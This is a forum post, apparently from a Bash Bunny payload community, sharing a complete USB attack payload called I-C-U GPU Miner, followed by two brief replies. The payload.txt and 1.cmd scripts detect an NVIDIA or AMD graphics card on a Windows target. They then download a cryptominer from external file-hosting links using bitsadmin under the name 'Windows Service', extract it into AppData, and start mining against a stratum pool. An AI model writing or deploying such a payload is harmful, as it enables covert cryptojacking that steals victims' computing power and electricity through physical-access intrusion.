[PAYLOAD] ICUGPU (I see you GPU!) Miner

[InfoSecREDD]

I-C-U GPU Miner

By Ar1k88

 

As a Celebration for Firmware 1.4, I am releasing the 2nd part of the Cryptocurrency Mining scripts I have laying around.

This Nifty lil script will Detect if a "desired" Graphics Card is installed, and downloads the correct miner depending on manufacturer.

If not, it displays a Custom Error Message letting you know that there is "No Supported GPU".

(Once again I took out a bit of this code due to the way I 1st coded it.)

Enjoy!

-Ar1k88

Payload.txt

#!/bin/bash
#
# -------------------------------------------------------------------
# Title:         I-C-U-GPU
# Author:        Ar1k88
# Verison:       2.1e 
# Target:        Windows 7-10
# Category:      Exploitation/Resources
#
# Notes:
# -------------------------------------------------------------------
# I dont know why I code these things, but it works. You'll need to 
# host your own AMD/NVIDIA Miners on a Direct Download Link. (If you
# dont know what that is, Google it.) I based this off Claymore's GPU
# Miner and Tpruvot's ccminer. All downloads can be found by searching
# the web and githubs.
# 
# Here we go.
#  -Ar1k88
# -------------------------------------------------------------------

# Start the Attack!
LED ATTACK
# Setting to proper Attackmode.
ATTACKMODE HID STORAGE
RUN WIN powershell ".((GWMI win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.cmd')"
# Give Miner 10 seconds to Download.
Q DELAY 10000

LED FINISH

 

 

1.cmd  (Where the real work goes on.)

@echo off
REM -------------------------------------------------------------------
REM Script:      I-C-U-GPU
REM Platform:    Windows 7-10
REM Author:      Ar1k88
REM 
REM Notes:
REM -------------------------------------------------------------------
REM I dont know why I code these things, but it works. You'll need to 
REM host your own AMD/NVIDIA Miners on a Direct Download Link. (If you
REM dont know what that is, Google it.) I based this off Claymore's GPU
REM Miner and Tpruvot's ccminer. All downloads can be found by searching
REM the web and githubs.
REM 
REM Here we go.
REM -Ar1k88
REM -------------------------------------------------------------------

REM --------------------
REM - Scan for Troops! -
REM --------------------

REM Enabling extensions to help with variables in script.
SETLOCAL ENABLEEXTENSIONS
REM Clearing screen to start the script.
cls

REM Running Custom GPU detection script. 2-Part
:DETECT
REM PART 1 - Print local Video Controllers Model Number into a local file.
for /F "tokens=* skip=1" %%n in ('WMIC path Win32_VideoController get Name ^| findstr "."') do set GPU_NAME=%%n
REM Print to a local file in the scripts current directory.
echo %GPU_NAME% > %~dp0\info.txt

REM PART 2 - Check for Certain Types of GPU's.

REM Check for NVIDIA GPU.
:DETECT1
>nul find "NVIDIA GeForce" %~dp0\info.txt && (
  GOTO FOUNDN
) || (
  GOTO DETECT2
)

REM Check for AMD GPU.
:DETECT2
>nul find "Radeon RX" %~dp0\info.txt && (
  GOTO FOUNDA
) || (
  GOTO NOTFOUND
)


REM if not found, Display prompt and Exit.
:NOTFOUND
echo No Supported GPU was found.
REM Remove next line to just print into the console.
msg * "No Supported GPU was found."
pause >NUL
exit /b



REM -------------------
REM - Start the Army! -
REM -------------------

REM If NVIDIA GPU is Found.
:FOUNDN
REM Printing GPU Info into the Console.
echo GPU Found:
type %~dp0\info.txt
del /f %~dp0\info.txt >NUL
REM Downloading NVIDIA Miner.
REM -- Insert your Direct Download link below in the URL bitsadmin pulls from. --
bitsadmin.exe /transfer "Windows Service" https://s02.solidfilesusercontent.com/MzU0MTE3ZjZmNzFjNjRjNzA0ZTQwOWEzMGE0MzRlNzNiZWJjOGYzYjoxZTY1em46TXktX3QyczlZcHB3Y2tnem5Rd2wxblhiV3lz/6PGnXWWLYxd6j/ccminer.zip %APPDATA%\miner.zip >NUL
echo Done downloading, Continuing Script.
REM Unzipping Miner.
cd %~dp0
REM Create on-the-go Unzip Script screw 7zip, make Windows do it. -Ar1k88
@echo ZipFile="%APPDATA%\miner.zip">decomp.vbs
@echo ExtractTo="%APPDATA%">>decomp.vbs
@echo. >>decomp.vbs
@echo Set fso = CreateObject("Scripting.FileSystemObject")>>decomp.vbs
@echo sourceFile = fso.GetAbsolutePathName(ZipFile)>>decomp.vbs
@echo destFolder = fso.GetAbsolutePathName(ExtractTo)>>decomp.vbs
@echo. >>decomp.vbs
@echo Set objShell = CreateObject("Shell.Application")>>decomp.vbs
@echo Set FilesInZip=objShell.NameSpace(sourceFile).Items()>>decomp.vbs
@echo objShell.NameSpace(destFolder).copyHere FilesInZip, 16>>decomp.vbs
@echo. >>decomp.vbs
@echo Set fso = Nothing>>decomp.vbs
@echo Set objShell = Nothing>>decomp.vbs
@echo Set FilesInZip = Nothing>>decomp.vbs
REM Decompressing zip folder to %APPDATA%
call %~dp0\decomp.vbs
REM Cleaning Up.
del /f %~dp0\decomp.vbs
del /f %APPDATA%\miner.zip
REM Cleaned up, Run the Miner.
if EXIST "%APPDATA%\miner\" RMDIR  "%APPDATA%\miner" /S /Q 
REM Change the folder names to correspond to the correct miner for NVIDIA.
if NOT EXIST "%APPDATA%\miner" mkdir "%APPDATA%\miner" && copy "%APPDATA%\ccminer" "%APPDATA%\miner\" >NUL
RMDIR  "%APPDATA%\ccminer" /S /Q
cd "%APPDATA%\miner"
REM Change this to the EXE and arguements of the Miner you chose for NVIDIA.
%APPDATA%\miner\ccminer.exe -a cryptonight -o stratum+tcp://mgcloudhost.com:5555 -u 10 -p x
REM Go to the End Script.
GOTO END


REM If AMD GPU is found.
:FOUNDA
REM Printing GPU Info into the Console.
echo GPU Found:
type %~dp0\info.txt
del /f %~dp0\info.txt >NUL
REM Downloading AMD Miner
REM -- Insert your Direct Download link below in the URL bitsadmin pulls from. --
echo Downloading.. Please Wait..
bitsadmin.exe /transfer "Windows Service" https://s01.solidfilesusercontent.com/Zjc5NmYwZGU4ZDI3MGU2NTAxNjY4OTZmN2UyMDhhNGM5ZGRiY2RiYjoxZTY0aGU6c05qcWstMnRXM1JtUVk5a2NaSFJPNExqc1RN/KvnZGBAvne6MV/Claymore_CryptoNote_GPU_Miner_v9.7_Beta_-_POOL_Catalyst_15.12_%281%29.zip "%APPDATA%\miner.zip" >NUL
echo Done downloading, Continuing Script.
REM Unzipping Miner
cd %~dp0
REM Create on-the-go Unzip Script screw 7zip, make Windows do it. -Ar1k88
@echo ZipFile="%APPDATA%\miner.zip">decomp.vbs
@echo ExtractTo="%APPDATA%">>decomp.vbs
@echo. >>decomp.vbs
@echo Set fso = CreateObject("Scripting.FileSystemObject")>>decomp.vbs
@echo sourceFile = fso.GetAbsolutePathName(ZipFile)>>decomp.vbs
@echo destFolder = fso.GetAbsolutePathName(ExtractTo)>>decomp.vbs
@echo. >>decomp.vbs
@echo Set objShell = CreateObject("Shell.Application")>>decomp.vbs
@echo Set FilesInZip=objShell.NameSpace(sourceFile).Items()>>decomp.vbs
@echo objShell.NameSpace(destFolder).copyHere FilesInZip, 16>>decomp.vbs
@echo. >>decomp.vbs
@echo Set fso = Nothing>>decomp.vbs
@echo Set objShell = Nothing>>decomp.vbs
@echo Set FilesInZip = Nothing>>decomp.vbs
REM Decompressing zip folder to %APPDATA%
call %~dp0\decomp.vbs
REM Cleaning up.
del /f %~dp0\decomp.vbs
del /f %APPDATA%\miner.zip
REM Cleaned up, Run the Miner.
if EXIST "%APPDATA%\miner\" RMDIR  "%APPDATA%\miner" /S /Q 
REM Change the folder names to correspond to the correct miner for AMD.
if NOT EXIST "%APPDATA%\miner" mkdir "%APPDATA%\miner" && copy "%APPDATA%\Claymore CryptoNote GPU Miner v9.7 Beta - POOL" "%APPDATA%\miner\" >NUL
RMDIR  "%APPDATA%\Claymore CryptoNote GPU Miner v9.7 Beta - POOL" /S /Q
cd "%APPDATA%\miner"
REM Change this to the EXE and arguements of the Miner you chose for AMD.
%APPDATA%\miner\NsGpuCNMiner.exe -o stratum+tcp://mgcloudhost.com:5555 -u 10 -p x
REM Go to the End Script.
GOTO END

REM End Script. You can choose to clean up the folder, and exit. - or just exit.
:END
REM Uncomment next line to remove Miner folder after mining is done.
REM RMDIR "%APPDATA%\miner" /S /Q

REM Exiting script.
exit /b

 

 

Enjoy!

-Ar1k88

https://twitter.com/ar1k88

[InfoSecREDD]

One of these days, I'll put it to the GitHub. Just don't really think they are "needed".

[Dave-ee Jones]

16 hours ago, Ar1k88 said:

One of these days, I'll put it to the GitHub. Just don't really think they are "needed".

None of my stuff's in the Github.

Partly because I don't know how, can't be bothered and people can add it to their library if they want anyway..